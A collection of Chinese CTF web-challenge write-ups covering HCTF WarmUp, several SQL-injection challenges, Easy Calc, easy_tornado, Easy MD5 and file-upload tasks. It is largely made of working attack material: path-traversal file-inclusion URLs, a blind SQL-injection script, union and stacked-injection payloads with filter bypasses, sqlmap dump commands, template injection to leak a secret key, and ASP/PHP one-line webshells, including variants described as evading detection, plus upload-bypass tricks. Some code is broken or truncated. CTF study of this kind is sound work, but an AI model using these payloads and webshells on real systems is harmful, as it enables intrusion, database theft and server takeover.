传入key，首先判断key是否为数字或者数字字符。然后对key取整。最后判断key和str是否相等。这里存在弱比较漏洞。
原理：如果key为数字时，在做==比较时，str字符串自动变为数字，即str=123

传参key=123

END。

代码审计+GET传参+文件包含漏洞[HCTF 2018]WarmUp

没有任何提示，查看源码，

提示source.php，直接访问http://e7b53743-ea71-49a6-a0d2-93e2bafa75ee.node4.buuoj.cn:81/source.php

进行代码审计

 "source.php","hint"=>"hint.php"];
            if (! isset($page) || !is_string($page)) {
                echo "you can't see it";
                return false;
            }

            if (in_array($page, $whitelist)) {
                return true;
            }

            $_page = mb_substr(
                $page,
                0,
                mb_strpos($page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }

            $_page = urldecode($page);
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }
            echo "you can't see it";
            return false;
        }
    }

    if (! empty($_REQUEST['file'])
        && is_string($_REQUEST['file'])
        && emmm::checkFile($_REQUEST['file'])
    ) {
        include $_REQUEST['file'];
        exit;
    } else {
        echo "
";
    }  
?>

跳过emmm类判断，后面if的三个条件，分别判断

 if (! empty($_REQUEST['file'])  //$_REQUEST['file']值非空
        && is_string($_REQUEST['file'])  //$_REQUEST['file']值为字符串
        && emmm::checkFile($_REQUEST['file'])  //能够通过checkFile函数校验
    ) {
        include $_REQUEST['file'];  //包含$_REQUEST['file']文件
        exit;
    } else {
        echo "
";
        //打印滑稽表情
    }  

接着checkFile函数分析，首先是whitelist白名单，列出source.php和hint.php两个元素，尝试访问，

告诉我们flag在ffffllllaaaagggg中，继续分析checkFile

    highlight_file(__FILE__); //打印代码
    class emmm  //定义emmm类
    {
        public static function checkFile(&$page)//将传入的参数赋给$page
        {
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];//声明$whitelist（白名单）数组
            if (! isset($page) || !is_string($page)) {//若$page变量不存在或非字符串
                echo "you can't see it";//打印"you can't see it"
                return false;//返回false
            }

            if (in_array($page, $whitelist)) {//若$page变量存在于$whitelist数组中
                return true;//返回true
            }

            $_page = mb_substr(//该代码表示截取$page中'?'前部分，若无则截取整个$page
                $page,
                0,
                mb_strpos($page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }

            $_page = urldecode($page);//url解码$page
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }
            echo "you can't see it";
            return false;
        }
    }

可以看到函数代码中有四个if语句

• 第一个if语句对变量进行检验，要求$page为字符串，否则返回false
• 第二个if语句判断$page是否存在于$whitelist数组中，存在则返回true
• 第三个if语句判断截取后的$page是否存在于$whitelist数组中，截取$page中'?'前部分，存在则返回true
• 第四个if语句判断url解码并截取后的$page是否存在于$whitelist中，存在则返回true
  若以上四个if语句均未返回值，则返回false

有三个if语句可以返回true，第二个语句直接判断$page，不可用
第三个语句截取'?'前部分，由于?被后部分被解析为get方式提交的参数，也不可利用
第四个if语句中，先进行url解码再截取，因此我们可以将?经过两次url编码，在服务器端提取参数时解码一次，checkFile函数中解码一次，仍会解码为'?'，仍可通过第四个if语句校验。（'?'两次编码值为'%253f'或者%25%33%66）,构造url：

http://***:***/source.php?file=source.php%253f../../../../../ffffllllaaaagggg

注入题目

盲注

查看源码，发现什么都没有

抓包

对id参数进行注入，返回值为bool猜测为布尔注入

SUBSTR(string,start,count)

取子字符串,从start开始,取count个

ASCII(str)

返回字符串str的最左字符的数值。返回0，如果str为空字符串。返回NULL，如果str为NULL。 ASCII()返回数值是从0到255。

例如：

SQL> SELECT ASCII('2'); 返回2的ascii码50

SQL> SELECT ASCII('dx'); 返回d的ascii码100

IF(a,b,c)

if判断，如果a满足条件，返回b，否则返回c

例如：

SQL> select if(ascii("a")=99,1,2); 返回2

import requests
import time
'''
分析
id=true或1 返回 Hello, glzjin wants a girlfriend. 可以利用
id=2 返回 Do you want to be my girlfriend?
id=(表达式) 根据返回结果，逐个字母判断flag值
查询flag的SQL语句(由于过滤了空格，要用括号代替)：(select(flag)from(flag))
使用SQL语句逐个取出flag字符：substr((select(flag)from(flag)),i,1) 从第i个取1一个字符
判断取出的的字符是什么字符：
根据什么判断？ascii
if(ascii(substr(select(flag)from(flag),i,1))=某ascii值,1,0)   正确返回1，错误返回0
每个字符都要进行判断，每次判断都要循环，所以是一个两层循环
'''
url = 'http://ea9211c6-ae0f-4e03-895e-007dd742f521.node4.buuoj.cn:81/index.php'
ch = ''
c = 0  # 记录一下循环次数
i = 1
asciivalue = 1
flag = 'flag{'
# mylist内容是包含ascii码值的列表，包括了对应的数字、字母、{}、-
mylist = list(range(45, 46)) + list(range(48, 58)) + list(range(65, 91)) + list(range(97, 124)) + list(range(125, 126))
for i in range(6, 50):

for asciivalue in mylist:
# 发出请求
# POST中id的内容
   payload = 'if(ascii(substr((select(flag)from(flag)),{},1))={},1,0)'.format(i, asciivalue)

data = {
'id': payload
}
r = requests.post(url, data)
time.sleep(0.2)

# 检测回包内容

c += 1
if 'glzjin' in r.text:
ch = chr(asciivalue)
flag += ch
print('\nGet it!!   {}'.format(flag))
break
else:
print('.', end='')

if ch == '}':
print('Over!')
break

print(flag)
print(c)
# flag{3e9bad6e-155d-4fe1-9d03-79c4de2f5321}
#      xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx

POST[极客大挑战 2019]BuyFlag

代码审计+POST

主页是三叶草Syclover团队介绍，右上角MENU进入到pay界面，并有

查看源码

找到一段代码，意思要传入参数money和password，password=404&money=100000000;抓包

发现有身份验证，并且传入了cookie，把cookie改为user=1

代码中有一段纯数字判断，利用弱类型字符串替换404加空格

又提示数字太长，这里其实是int strcmp ( string $str1 , string $str2 )

参数 str1第一个字符串。str2第二个字符串。如果 str1 小于 str2 返回 < 0； 如果 str1 大于 str2 返回 > 0；如果两者相等，返回 0。

可知，传入的期望类型是字符串类型的数据，但是如果我们传入非字符串类型的数据的时候，这个函数将会有怎么样的行为呢？实际上，当这个函数接受到了不符合的类型，这个函数将发生错误，但是在5.3之前的php中，显示了报错的警告信息后，将return 0。

所以传入非字符串类型的参数就行了，我们传入的是数组，或者用科学计数法也可以

GET[RoarCTF 2019]Easy Calc

encodeURIComponent()函数+符号过滤

类似于一个计算器，查看源码发现

Z 注释说， 设置了 waf 并且很安全
代码里面存在 encodeURIComponent()函数， 其含义为

定义和用法

encodeURIComponent() 函数可把字符串作为 URI 组件进行编码。

该方法不会对 ASCII 字母和数字进行编码，也不会对这些 ASCII 标点符号进行编码： - _ . ! ~ * ' ( ) 。

其他字符（比如 ：;/?:@&=+$,# 这些用于分隔 URI 组件的标点符号），都是由一个或多个十六进制的转义序列替换的。

实例

在本例中，我们将使用 encodeURIComponent() 对 URI 进行编码：

输出：

http%3A%2F%2Fwww.w3school.com.cn

http%3A%2F%2Fwww.w3school.com.cn

%2Fp%201%2F %2C%2F%3F%3A%40%26%3D%2B%24%23

查看 calc.php

 会对我们输入的 num 变量， 进行正则判断， 判断是否存在这些字符

如果存在的化就会拦截
不存在的化， 就会通过 eval 函数， 执行我们输入的内容
calc.php?num=phpinfo() 403报错

说明网站不让我们传 num 这个变量， 结合代码中说的， 已经设置了 waf， 且安全，说明 waf 对 num 进行拦截，也就是说， waf 不让传 num。 但是我们从代码中看到， 要想获取 flag， 我们必须使用 eval 来
执行我们传的 num 变量的代码。 这个时候只能想办法绕过
这块有个知识点。PHP 将查询字符串（在 URL 或正文中） 转换为内部$_GET 或关联数组$_POST 的时候， 查询字符串在解析的过程中会将某些字符删除或用下划线代替 。

/calc.php? num=phpinfo()/*空格绕过*/+号也能绕过

在尝试执行 system 命令的时候， 因为需要使用单引号、 空格都被过滤

所以只能使用其他方式进行绕过， 我们想读取目录， 只要不存在空格、 单引号就行

这里利用 scandir()列出目录和文件,
scandir()函数返回指定目录中的文件和目录的数组。
scandir(/)相当于 ls /
var_dump()用于输出
var_dump()相当于 echo
利用 file_get_contents()读取并输出文件内容
file_get_contents(/flag.php)， 读取/flag.php 的代码
构造读取根目录 payload chr(47)="/"
/calc.php? num=var_dump(scandir(chr(47)))

在使用 file_get_contents()函数读取文件 /f1agg
/calc.php?%20num=var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))

sql[极客大挑战 2019]BabySQL

过滤“or”双写绕过

首先用万能密码1' or 1=1#失败

发现“or”被过滤，于是用||替换，查看有几个字段，发现需要双写绕过，1' || 1=1 oorrder bbyy 4;#，得知是3个字段，

查库' ununionion seselectlect 1,2,database() #返回库名“geek”

查表1' ununionion seselectlect 1,2,group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema='geek' #两个表 'b4bsql,geekuser'

查列1' ununionion seselectlect 1,2,group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_name='b4bsql' #三个列'id,username,password'

查信息1' ununionion seselectlect 1,2,group_concat(id,passwoorrd,username) frofromm geek.b4bsql #

Your_password_is_'1i_want_to_play_2077cl4y,2sql_injection_is_so_funsql,3do_you_know_pornhubporn,4github_is_different_from_pornhubgit,5you_found_flag_so_stopStop,6i_told_you_to_stopbadguy,7hack_by_cl4yhacker,8flag{b1e7803b-8795-4e02-b430-dc858366c618}flag'

sql[极客大挑战 2019]LoveSQL

尝试登陆admin 123

尝试万能密码，1' or 1=1# 123（随便输）

password '1ee42d3428a3c5c9abbef612529ceb7d' 尝试MD5解密，结果失败

同时确认可以sql注入，先抓包，再使用sqlmap注入，并确认注入点为username，

将传递内容放入txt文件中

通过注入命令python sqlmap.py -r 1.txt检测，成功后通过注入命令继续

python sqlmap.py -r 1.txt –dbs

python sqlmap.py -r 1.txt -D geek –tables

python sqlmap.py -r 1.txt -D geek -T l0ve1ysq1 --columns

python sqlmap.py -r 1.txt -D geek -T l0ve1ysq1 -C id,username,password –dump

得到flag。

方法2：

判断字段数；

/check.php?username=admin' order by 3%23&password=1 存在

/check.php?username=admin' order by 4%23&password=1 报错

注意：此时是在url中输入的，所以不能用#，而用其url编码%23。

可知共3个字段。用union查询测试注入点（回显点位）：

/check.php?username=1' union select 1,2,3%23&password=1

回显点位为2和3，得到回显点位为2和3，查询当前数据库名及版本：

/check.php?username=1' union select 1,database(),version()%23&password=1

可知当前数据库为geek，开始爆表：

/check.php?username=1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()%23&password=1

得到两个表名：geekuser和l0ve1ysq1，接着爆列：

/check.php?username=1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='l0ve1ysq1'%23&password=1

得到三个列名：id，username，password。爆数据：

/check.php?username=1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1%23&password=1

得到

Hello 2！

Your password is '1cl4ywo_tai_nan_le,2glzjinglzjin_wants_a_girlfriend,3Z4cHAr7zCrbiao_ge_dddd_hm,40xC4m3llinux_chuang_shi_ren,5Ayraina_rua_rain,6Akkoyan_shi_fu_de_mao_bo_he,7fouc5cl4y,8fouc5di_2_kuai_fu_ji,9fouc5di_3_kuai_fu_ji,10fouc5di_4_kuai_fu_ji,11fouc5di_5_kuai_fu_ji,12fouc5di_6_kuai_fu_ji,13fouc5di_7_kuai_fu_ji,14fouc5di_8_kuai_fu_ji,15leixiaoSyc_san_da_hacker,16flagflag{35b30d96-0920-49a9-b375-9688539f8821}'

sql[强网杯 2019]随便注

方法1

判断是否存在注入1' or 1=1 #测试，判断可能存在注入

查询字段，1' order by 1 # 发现只有两个字段，到3的时候开始报错，

准备进行回显，发现有过滤条件，

这个时候就要用到“堆叠注入”了，原理很简单，就是通过 ; 号注入多条SQL语句。

先通过show databases爆出数据库。1' ;show databases;#

得到库名"ctftraining"，"information_schema"，"mysql"，"performance_schema"，"supersqli"，"test"

准备爆表0'; show tables; #

得到表名"1919810931114514"， "words"

我们先尝试爆words表的内容，1'; show columns from words; #

没有需要的内容，继续爆表"1919810931114514"，这里学到一个新知识点，表名为数字时，要用反引号包起来查询。

1'; show columns from `1919810931114514`; #

看到“flag”字段，但是没有值，这时想到，获取数据的语句为 select * from ` 1919810931114514 `

但是在最开始的时候，我们知道，会对select、update、delete、drop、insert、where进行过滤

所以需要对select进行绕过。

预处理语句+堆叠注入

知识点

PREPARE name from '[my sql sequece]'; //预定义SQL语句

EXECUTE name; //执行预定义SQL语句

(DEALLOCATE || DROP) PREPARE name; //删除预定义SQL语句

预定义语句也可以通过变量进行传递:　

SET @tn = 'hahaha'; //存储表名

SET @sql = concat('select * from ', @tn); //存储SQL语句

PREPARE name from @sql; //预定义SQL语句

EXECUTE name; //执行预定义SQL语句

(DEALLOCATE || DROP) PREPARE sqla; //删除预定义SQL语句

本题因为对select进行了过滤，可以直接利用concat函数拆分select，也可利用 char() 函数将select的ASCII码转换为select字符串，接着利用concat()函数进行拼接得到select查询语句，从而绕过过滤

char(115,101,108,101,99,116)<----->'select'

Payload1

对select直接拆分

1';PREPARE hacker from concat('s','elect', ' * from `1919810931114514` ');EXECUTE hacker;#

1;PREPARE hacker from concat('select', ' flag from ','F','lag');EXECUTE hacker;#

Payload2

不使用变量

1';PREPARE sqltest from concat(char(115,101,108,101,99,116), ' * from `1919810931114514` ');EXECUTE sqltest;#

Payload3

使用变量

1';SET @sqli=concat(char(115,101,108,101,99,116),'* from `1919810931114514`');PREPARE sqltest from @sqli;EXECUTE sqltest;#

END。

sql[SUCTF 2019]EasySQL

有话说在前面，这个需要联想到后端代码。。。。

进入题目：

一个输入框，查看源码发现是POST传参，

随便输入，1，1'，1' order by 1 #等

发现只有输入1时有回显，说明大部分语句都被过滤了，尝试堆叠注入，1;show databases;

得到数据库后，查询表，1;show tables;

只有Flag一个表，这时候就看最后一步能不能得到flag了，1;show columns from Flag;

不出所料，难为人了，只好去寻找大神的wp寻找解决办法，看了一圈发现，需要猜到后端的源码是这样：

select $post['query']||flag from Flag（非要解释的话，在堆叠注入的时候发现结尾加不加#不影响结果，可能就是后面跟或运算的缘故）

要想办法让 ||不是逻辑或运算，官方给的 payload 是1;set sql_mode=PIPES_AS_CONCAT;select 1，拼接一下就是select 1;set sql_mode=PIPES_AS_CONCAT;select 1||flag from Flag

关于 sql_mode : 它定义了 MySQL 应支持的 SQL 语法，以及应该在数据上执行何种确认检查，其中的PIPES_AS_CONCAT将 ||视为字符串的连接操作符而非 “或” 运算符

还有就是这个模式下进行查询的时候，使用字母连接会报错，使用数字连接才会查询出数据，因为这个||相当于是将 select 1 和 select flag from flag 的结果拼接在一起

关于非预期解 : *,1

拼接一下，不难理解 :select *,1||flag from Flag

等同于select * from Flag

python模板注入[护网杯 2018]easy_tornado

题目有三个链接，分别打开查看，获得文件名 /fllllllllllllag

请求链接格式如下，并给出了filehash的计算方法 md5(cookie_secret+md5(filename))

/file?filename=/flag.txt&filehash=b3fa6379671c6369b508913476fba734

但是如何获取cookie_secret？先随便传入一个

md5(filename)=3bf9f6cf685a6dd8defadabfb41a03a1

发现跳转到错误页面，并且msg参数的值会回显到屏幕上：

要正常访问/fllllllllllllag文件的内容，计算出filehash的值，需要先获取cookie_secret。网上的wp传入的是/error?msg={ {handler.settings}}会打印出cookie_secret，搜索tornado框架的文档：

在Tornado的前端页面模板中，Tornado提供了一些对象别名来快速访问对象，此处就是借助handler.settings来进行访问。

handler：构建一个tornado网站，必须包含一个或者多个handler，这些handler是RequestHandler的子类。每个请求都会被映射到handler中进行处理，处理后再将结果返回给客户端。所以，hanlder可以视为客户端请求跟业务服务逻辑间的桥梁。

而RequestHandler.settings又是self.application.settings的别名；

因此handler.settings实际指向RequestHandler.application.settings，在tornado官方文档中搜索可知application.settings中保存了许多关键字参数，其中就包含cookie_secret。

访问/error?msg={ {handler.settings}}得到 cookie_secret: bdc212e2-92c6-4e9f-a89c-4f8a515217a3

构建filehash：md5(cookie_secret+md5(filename)) =md5(bdc212e2-92c6-4e9f-a89c-4f8a515217a33bf9f6cf685a6dd8defadabfb41a03a1)

import hashlib
cookie_secret = 'bdc212e2-92c6-4e9f-a89c-4f8a515217a3'
filename = '/fllllllllllllag'
md51 = hashlib.md5()
md51.update(filename.encode(encoding='utf-8'))
str2 = cookie_secret + md51.hexdigest()
md52 = hashlib.md5()
md52.update(str2.encode(encoding='utf-8'))
print(md52.hexdigest())

/file?filename=/fllllllllllllag&filehash=ccd9259226d66d997cd256d4a36c30a6

BJDCTF2020]Easy MD5

MD5绕过，get+post

打开题目，提交查询没有回显，源码也没有任何提示，直接抓包。

发现这么一句Hint: select * from 'admin' where password=md5($pass,true)，意思是sql查询，需要password=md5($pass,true)条件为真时，才会执行select * form admin，可md5($pass,true)是什么东西？上网查询了一下

md5()函数会将我们输入的值，加密，然后转换成16字符的二进制格式，由于ffifdyop被md5加密后的276f722736c95d99e921722cf9ed621c转换成16位原始二进制格式为'or’6

之后sql语言就转化为select * from 'admin' where password='or 6，总之参数等于ffifdyop，md5($pass,true)返回TRUE。抓包看一下

界面发生了变化，看一下源码

要传入参数a和b，条件是a和b值不同，但MD5加密后相等，用的是md5弱类型，为0e开头的会被识别为科学记数法，结果均为0。

•QNKCDZO

•0e830400451993494058024219903391

•s878926199a

•0e545993274517709034328855841020

•s155964671a

•0e342768416822451524974117254469

•s214587387a

•0e848240448830537924465865611904

•s214587387a

•0e848240448830537924465865611904

•s878926199a

•0e545993274517709034328855841020

•s1091221200a

•0e940624217856561557816327384675

•s1885207154a

•0e509367213418206700842008763514

于是构建payload：

http://6b8eeea7-31ae-4c3a-a7ec4dd056371915.node4.buuoj.cn:81/levels91.php?a=QNKCDZO&b=s878926199a

再次跳转，文件包涵，需要POST两个参数，MD5强比较，用MD5数组跳过就可以。param1[]=1¶m2[]=2

flag{2fa51612-4d37-4388-976e-15e84568dea3}

一句话木马

 
 
 
 
 
//容错代码 
//使用Lanker一句话客户端的专家模式执行相关的PHP语句 
 
 
/*使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入*/:h=@eval_r($_POST1); 
 
//绕过@eval_r($_POST[sb]) 
 密码：x

1.<%eval request("YouPass")%>
2. <%executerequest("YouPass")%>
3. <%execute(request("YouPass"))%>
免杀大部分网站的一句话
4.<% set ms = server.CreateObject("MSScriptControl.ScriptControl.1") ms.Language="VBScript" ms.AddObject "Response", Response ms.AddObject "request", request ms.ExecuteStatement("ev"&"al(request(""YouPass""))") %>
    免杀部分网站过略<%,%>的一句话
5. 

文件上传题目

[极客大挑战 2019]Upload

过滤php后缀，

打开题目

上传文件，尝试一句话木马php文件，png文件，jpg文件只有jpg文件可以上传通过，于是构建jpg图片马：

GIF8a

题目还过滤了"

抓包修改

Content-Disposition: form-data; name="file"; filename="jspshell.phtml"

Content-Type: image/jpeg

php的后缀名也被过滤，常见的php后缀名绕过方式有 php3 php4 php5 phtml pht 这道题里可以上传phtml

[ACTF2020 新生赛]Upload

上传图片马

测试上传后，提示过滤只能上传jpg，png，gif文件，需要制作图片马

copy 2.png/b+ma.php/a ma.png

burp抓包修改文件后缀

上传成功，回显路径，蚁剑连接

[极客大挑战 2019]Knife

简单的一句话木马连接

一句话木马，直接使用蚁剑链接，

查看根目录，找到flag

END。

[SUCTF 2019]CheckIn

通过.user.ini进行绕过，首先介绍php.ini文件，php有很多配置，并可以在php.ini中设置。在每个正规的网站里，都会由这样一个文件，而且每次运行PHP文件时，都会去读取这个配置文件，来设置PHP的相关规则。